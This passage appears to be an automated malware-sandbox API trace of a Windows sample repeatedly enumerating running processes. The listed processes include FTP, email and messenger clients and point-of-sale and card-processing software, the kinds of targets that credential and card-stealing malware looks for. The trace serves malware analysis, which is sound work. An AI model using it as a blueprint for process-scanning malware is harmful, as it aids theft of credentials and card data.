lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0276.822] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0276.823] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0276.828] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0276.830] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0276.832] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0276.833] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0276.835] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0276.836] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0276.838] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0276.840] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0276.844] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0276.846] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0276.848] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0276.849] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0276.851] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0276.852] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0276.854] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0276.895] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0276.897] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0276.899] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0276.900] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0276.902] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0276.907] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0276.909] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0276.910] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0276.912] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0276.913] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0276.915] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0276.916] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0276.921] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0276.922] CloseHandle (hObject=0x758) returned 1 [0276.922] Sleep (dwMilliseconds=0x64) [0277.030] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0277.039] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.041] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0277.042] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0277.066] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0277.067] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0277.068] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0277.070] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0277.071] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0277.073] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0277.075] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.079] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.081] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0277.082] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.084] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.085] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.087] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.088] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.089] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.110] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.112] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0277.113] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0277.115] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0277.116] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.117] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0277.119] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0277.120] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0277.122] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0277.126] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.127] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0277.129] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0277.130] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0277.132] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0277.133] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0277.135] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0277.136] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0277.151] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0277.153] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0277.154] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0277.156] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0277.157] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0277.159] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0277.160] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0277.161] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0277.163] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0277.164] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0277.166] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0277.167] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0277.219] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0277.221] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0277.222] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0277.224] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0277.225] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0277.227] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, 